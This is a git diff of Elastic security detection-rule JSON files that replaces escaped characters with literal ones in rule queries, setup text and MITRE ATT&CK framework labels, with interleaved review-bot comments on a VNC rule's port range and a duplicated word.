@@ -15,7 +15,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "VNC (Virtual Network Computing) from the Internet", - "query": "event.dataset: network_traffic.flow and network.transport:tcp and destination.port \u003e= 5800 and destination.port \u003c= 5810 and\n not source.ip:(\n 10.0.0.0/8 or\n 127.0.0.0/8 or\n 169.254.0.0/16 or\n 172.16.0.0/12 or\n 192.0.0.0/24 or\n 192.0.0.0/29 or\n 192.0.0.8/32 or\n 192.0.0.9/32 or\n 192.0.0.10/32 or\n 192.0.0.170/32 or\n 192.0.0.171/32 or\n 192.0.2.0/24 or\n 192.31.196.0/24 or\n 192.52.193.0/24 or\n 192.168.0.0/16 or\n 192.88.99.0/24 or\n 224.0.0.0/4 or\n 100.64.0.0/10 or\n 192.175.48.0/24 or\n 198.18.0.0/15 or\n 198.51.100.0/24 or\n 203.0.113.0/24 or\n 240.0.0.0/4 or\n \"::1\" or\n \"FE80::/10\" or\n \"FF00::/8\"\n ) and\n destination.ip:(\n 10.0.0.0/8 or\n 172.16.0.0/12 or\n 192.168.0.0/16\n )\n", + "query": "event.dataset: network_traffic.flow and network.transport:tcp and destination.port >= 5800 and destination.port <= 5810 and\n not source.ip:(\n 10.0.0.0/8 or\n 127.0.0.0/8 or\n 169.254.0.0/16 or\n 172.16.0.0/12 or\n 192.0.0.0/24 or\n 192.0.0.0/29 or\n 192.0.0.8/32 or\n 192.0.0.9/32 or\n 192.0.0.10/32 or\n 192.0.0.170/32 or\n 192.0.0.171/32 or\n 192.0.2.0/24 or\n 192.31.196.0/24 or\n 192.52.193.0/24 or\n 192.168.0.0/16 or\n 192.88.99.0/24 or\n 224.0.0.0/4 or\n 100.64.0.0/10 or\n 192.175.48.0/24 or\n 198.18.0.0/15 or\n 198.51.100.0/24 or\n 203.0.113.0/24 or\n 240.0.0.0/4 or\n \"::1\" or\n \"FE80::/10\" or\n \"FF00::/8\"\n ) and\n destination.ip:(\n 10.0.0.0/8 or\n 172.16.0.0/12 or\n 192.168.0.0/16\n )\n", "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" ], @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", 
@@ -77,7 +77,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/5700cb81-df44-46aa-a5d7-337798f53eb8_104.json b/packages/security_detection_engine/kibana/security_rule/5700cb81-df44-46aa-a5d7-337798f53eb8_104.json index 2500a0d9852..0037b66d23f 100644 --- a/packages/security_detection_engine/kibana/security_rule/5700cb81-df44-46aa-a5d7-337798f53eb8_104.json +++ b/packages/security_detection_engine/kibana/security_rule/5700cb81-df44-46aa-a5d7-337798f53eb8_104.json 
@@ -17,7 +17,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "VNC (Virtual Network Computing) from the Internet", - "query": "(event.dataset: network_traffic.flow or (event.category: (network or network_traffic))) and\n network.transport:tcp and destination.port \u003e= 5800 and destination.port \u003c= 5810 and\n not source.ip:(\n 10.0.0.0/8 or\n 127.0.0.0/8 or\n 169.254.0.0/16 or\n 172.16.0.0/12 or\n 192.0.0.0/24 or\n 192.0.0.0/29 or\n 192.0.0.8/32 or\n 192.0.0.9/32 or\n 192.0.0.10/32 or\n 192.0.0.170/32 or\n 192.0.0.171/32 or\n 192.0.2.0/24 or\n 192.31.196.0/24 or\n 192.52.193.0/24 or\n 192.168.0.0/16 or\n 192.88.99.0/24 or\n 224.0.0.0/4 or\n 100.64.0.0/10 or\n 192.175.48.0/24 or\n 198.18.0.0/15 or\n 198.51.100.0/24 or\n 203.0.113.0/24 or\n 240.0.0.0/4 or\n \"::1\" or\n \"FE80::/10\" or\n \"FF00::/8\"\n ) and\n destination.ip:(\n 10.0.0.0/8 or\n 172.16.0.0/12 or\n 192.168.0.0/16\n )\n", + "query": "(event.dataset: network_traffic.flow or (event.category: (network or network_traffic))) and\n network.transport:tcp and destination.port >= 5800 and destination.port <= 5810 and\n not source.ip:(\n 10.0.0.0/8 or\n 127.0.0.0/8 or\n 169.254.0.0/16 or\n 172.16.0.0/12 or\n 192.0.0.0/24 or\n 192.0.0.0/29 or\n 192.0.0.8/32 or\n 192.0.0.9/32 or\n 192.0.0.10/32 or\n 192.0.0.170/32 or\n 192.0.0.171/32 or\n 192.0.2.0/24 or\n 192.31.196.0/24 or\n 192.52.193.0/24 or\n 192.168.0.0/16 or\n 192.88.99.0/24 or\n 224.0.0.0/4 or\n 100.64.0.0/10 or\n 192.175.48.0/24 or\n 198.18.0.0/15 or\n 198.51.100.0/24 or\n 203.0.113.0/24 or\n 240.0.0.0/4 or\n \"::1\" or\n \"FE80::/10\" or\n \"FF00::/8\"\n ) and\n destination.ip:(\n 10.0.0.0/8 or\n 172.16.0.0/12 or\n 192.168.0.0/16\n )\n", "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" ], @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", 
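Review bot: The `+` line for `query` still matches only `destination.port >= 5800 and destination.port <= 5810`, which is the VNC HTTP/Java-viewer port range; the RFB display ports (conventionally 5900–5910) that carry the actual remote-control session are not covered, so a plain VNC client connecting from the Internet would not trigger this rule unless a sibling rule covers that range, which I cannot see from here. If no such rule exists, widening the predicate to `(destination.port >= 5800 and destination.port <= 5810) or (destination.port >= 5900 and destination.port <= 5910)` would close the gap. The `source.ip` exclusion list also omits `0.0.0.0/8`, which is listed in the referenced IANA special-purpose registry; adding it keeps the list consistent with the cited reference. Since these rule files appear to be exported from an upstream rule set, the change presumably needs to be made there rather than only in this package.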
@@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/571afc56-5ed9-465d-a2a9-045f099f6e7e_100.json b/packages/security_detection_engine/kibana/security_rule/571afc56-5ed9-465d-a2a9-045f099f6e7e_100.json index 1824185a1c6..6e49fc670dc 100644 --- a/packages/security_detection_engine/kibana/security_rule/571afc56-5ed9-465d-a2a9-045f099f6e7e_100.json +++ b/packages/security_detection_engine/kibana/security_rule/571afc56-5ed9-465d-a2a9-045f099f6e7e_100.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/571afc56-5ed9-465d-a2a9-045f099f6e7e_101.json b/packages/security_detection_engine/kibana/security_rule/571afc56-5ed9-465d-a2a9-045f099f6e7e_101.json index a9f7402316c..f58168a1bc8 100644 --- a/packages/security_detection_engine/kibana/security_rule/571afc56-5ed9-465d-a2a9-045f099f6e7e_101.json +++ b/packages/security_detection_engine/kibana/security_rule/571afc56-5ed9-465d-a2a9-045f099f6e7e_101.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/573f6e7a-7acf-4bcd-ad42-c4969124d3c0_101.json b/packages/security_detection_engine/kibana/security_rule/573f6e7a-7acf-4bcd-ad42-c4969124d3c0_101.json index 5c8fac6ee42..f727c15dcdd 100644 --- a/packages/security_detection_engine/kibana/security_rule/573f6e7a-7acf-4bcd-ad42-c4969124d3c0_101.json +++ b/packages/security_detection_engine/kibana/security_rule/573f6e7a-7acf-4bcd-ad42-c4969124d3c0_101.json 
@@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/573f6e7a-7acf-4bcd-ad42-c4969124d3c0_102.json b/packages/security_detection_engine/kibana/security_rule/573f6e7a-7acf-4bcd-ad42-c4969124d3c0_102.json index 5be784b35c4..13252822829 100644 --- a/packages/security_detection_engine/kibana/security_rule/573f6e7a-7acf-4bcd-ad42-c4969124d3c0_102.json +++ b/packages/security_detection_engine/kibana/security_rule/573f6e7a-7acf-4bcd-ad42-c4969124d3c0_102.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/577ec21e-56fe-4065-91d8-45eb8224fe77_105.json b/packages/security_detection_engine/kibana/security_rule/577ec21e-56fe-4065-91d8-45eb8224fe77_105.json index e0e5c4b417b..beefa073c64 100644 --- a/packages/security_detection_engine/kibana/security_rule/577ec21e-56fe-4065-91d8-45eb8224fe77_105.json +++ b/packages/security_detection_engine/kibana/security_rule/577ec21e-56fe-4065-91d8-45eb8224fe77_105.json 
@@ -52,7 +52,7 @@ ], "risk_score": 73, "rule_id": "577ec21e-56fe-4065-91d8-45eb8224fe77", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "high", "tags": [ "Elastic", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/577ec21e-56fe-4065-91d8-45eb8224fe77_106.json b/packages/security_detection_engine/kibana/security_rule/577ec21e-56fe-4065-91d8-45eb8224fe77_106.json index c03c2c5a946..d3282af4e4f 100644 --- a/packages/security_detection_engine/kibana/security_rule/577ec21e-56fe-4065-91d8-45eb8224fe77_106.json +++ b/packages/security_detection_engine/kibana/security_rule/577ec21e-56fe-4065-91d8-45eb8224fe77_106.json 
@@ -52,7 +52,7 @@ ], "risk_score": 73, "rule_id": "577ec21e-56fe-4065-91d8-45eb8224fe77", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "high", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/577ec21e-56fe-4065-91d8-45eb8224fe77_107.json b/packages/security_detection_engine/kibana/security_rule/577ec21e-56fe-4065-91d8-45eb8224fe77_107.json index 0934afca775..f33a1879d36 100644 --- a/packages/security_detection_engine/kibana/security_rule/577ec21e-56fe-4065-91d8-45eb8224fe77_107.json +++ b/packages/security_detection_engine/kibana/security_rule/577ec21e-56fe-4065-91d8-45eb8224fe77_107.json 
@@ -52,7 +52,7 @@ ], "risk_score": 73, "rule_id": "577ec21e-56fe-4065-91d8-45eb8224fe77", - "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/57bccf1d-daf5-4e1a-9049-ff79b5254704_1.json b/packages/security_detection_engine/kibana/security_rule/57bccf1d-daf5-4e1a-9049-ff79b5254704_1.json index 15131f5299c..0208f767e46 100644 --- a/packages/security_detection_engine/kibana/security_rule/57bccf1d-daf5-4e1a-9049-ff79b5254704_1.json +++ b/packages/security_detection_engine/kibana/security_rule/57bccf1d-daf5-4e1a-9049-ff79b5254704_1.json 
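Review bot: The `+` line for `setup` in the `@@ -52,7 +52,7 @@` hunk keeps the duplicated word in "Steps to implement the logging policy with with Advanced Audit Configuration", so the typo survives the escape normalization and is shown as-is in the rule's Setup guide. It should read `Steps to implement the logging policy with Advanced Audit Configuration:`. As these rule JSON files look like exported copies of an upstream rule set, the fix presumably has to land there too or it will be overwritten on the next export.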
@@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/57bccf1d-daf5-4e1a-9049-ff79b5254704_2.json b/packages/security_detection_engine/kibana/security_rule/57bccf1d-daf5-4e1a-9049-ff79b5254704_2.json index e84b2a039dc..9bcd9d9704c 100644 --- a/packages/security_detection_engine/kibana/security_rule/57bccf1d-daf5-4e1a-9049-ff79b5254704_2.json +++ b/packages/security_detection_engine/kibana/security_rule/57bccf1d-daf5-4e1a-9049-ff79b5254704_2.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/581add16-df76-42bb-af8e-c979bfb39a59_104.json b/packages/security_detection_engine/kibana/security_rule/581add16-df76-42bb-af8e-c979bfb39a59_104.json index 1e52ffeb888..cfd37a11e01 100644 --- a/packages/security_detection_engine/kibana/security_rule/581add16-df76-42bb-af8e-c979bfb39a59_104.json +++ b/packages/security_detection_engine/kibana/security_rule/581add16-df76-42bb-af8e-c979bfb39a59_104.json @@ -55,7 +55,7 @@ ], "risk_score": 21, "rule_id": "581add16-df76-42bb-af8e-c979bfb39a59", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", 
@@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/581add16-df76-42bb-af8e-c979bfb39a59_105.json b/packages/security_detection_engine/kibana/security_rule/581add16-df76-42bb-af8e-c979bfb39a59_105.json index 4ac119fac52..01d5cf45b8b 100644 --- a/packages/security_detection_engine/kibana/security_rule/581add16-df76-42bb-af8e-c979bfb39a59_105.json +++ b/packages/security_detection_engine/kibana/security_rule/581add16-df76-42bb-af8e-c979bfb39a59_105.json @@ -55,7 +55,7 @@ ], "risk_score": 21, "rule_id": "581add16-df76-42bb-af8e-c979bfb39a59", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/581add16-df76-42bb-af8e-c979bfb39a59_106.json b/packages/security_detection_engine/kibana/security_rule/581add16-df76-42bb-af8e-c979bfb39a59_106.json index 72ab99aad09..f25050c8038 100644 --- a/packages/security_detection_engine/kibana/security_rule/581add16-df76-42bb-af8e-c979bfb39a59_106.json 
+++ b/packages/security_detection_engine/kibana/security_rule/581add16-df76-42bb-af8e-c979bfb39a59_106.json @@ -55,7 +55,7 @@ ], "risk_score": 21, "rule_id": "581add16-df76-42bb-af8e-c979bfb39a59", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/581add16-df76-42bb-af8e-c979bfb39a59_107.json b/packages/security_detection_engine/kibana/security_rule/581add16-df76-42bb-af8e-c979bfb39a59_107.json index 0f448048a91..e6b8dc66302 100644 --- a/packages/security_detection_engine/kibana/security_rule/581add16-df76-42bb-af8e-c979bfb39a59_107.json +++ b/packages/security_detection_engine/kibana/security_rule/581add16-df76-42bb-af8e-c979bfb39a59_107.json 
@@ -55,7 +55,7 @@ ], "risk_score": 21, "rule_id": "581add16-df76-42bb-af8e-c979bfb39a59", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/581add16-df76-42bb-af8e-c979bfb39a59_108.json b/packages/security_detection_engine/kibana/security_rule/581add16-df76-42bb-af8e-c979bfb39a59_108.json index 2057d690d18..00f9f4d3980 100644 --- a/packages/security_detection_engine/kibana/security_rule/581add16-df76-42bb-af8e-c979bfb39a59_108.json +++ b/packages/security_detection_engine/kibana/security_rule/581add16-df76-42bb-af8e-c979bfb39a59_108.json 
@@ -55,7 +55,7 @@ ], "risk_score": 21, "rule_id": "581add16-df76-42bb-af8e-c979bfb39a59", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_104.json b/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_104.json index ea2196a62f1..5a20d5b26f1 100644 --- a/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_104.json +++ b/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_104.json 
@@ -65,7 +65,7 @@ ], "risk_score": 47, "rule_id": "58aa72ca-d968-4f34-b9f7-bea51d75eb50", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_105.json b/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_105.json index 47605ffe9e0..fcbab63a711 100644 --- a/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_105.json +++ b/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_105.json 
@@ -65,7 +65,7 @@
 ],
 "risk_score": 47,
 "rule_id": "58aa72ca-d968-4f34-b9f7-bea51d75eb50",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -77,7 +77,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_106.json b/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_106.json
index 3d49bb7930d..795d0a94bf3 100644
--- a/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_106.json
@@ -55,7 +55,7 @@
 ],
 "risk_score": 47,
 "rule_id": "58aa72ca-d968-4f34-b9f7-bea51d75eb50",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_107.json b/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_107.json
index 88df15e71c3..d9c0575182c 100644
--- a/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_107.json
@@ -55,7 +55,7 @@
 ],
 "risk_score": 47,
 "rule_id": "58aa72ca-d968-4f34-b9f7-bea51d75eb50",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_108.json b/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_108.json
index 054e66d9d86..44fbc892d14 100644
--- a/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_108.json
@@ -55,7 +55,7 @@
 ],
 "risk_score": 47,
 "rule_id": "58aa72ca-d968-4f34-b9f7-bea51d75eb50",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
@@ -91,7 +91,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_109.json b/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_109.json
index e74ea29ad00..cfa1050598e 100644
--- a/packages/security_detection_engine/kibana/security_rule/58aa72ca-d968-4f34-b9f7-bea51d75eb50_109.json
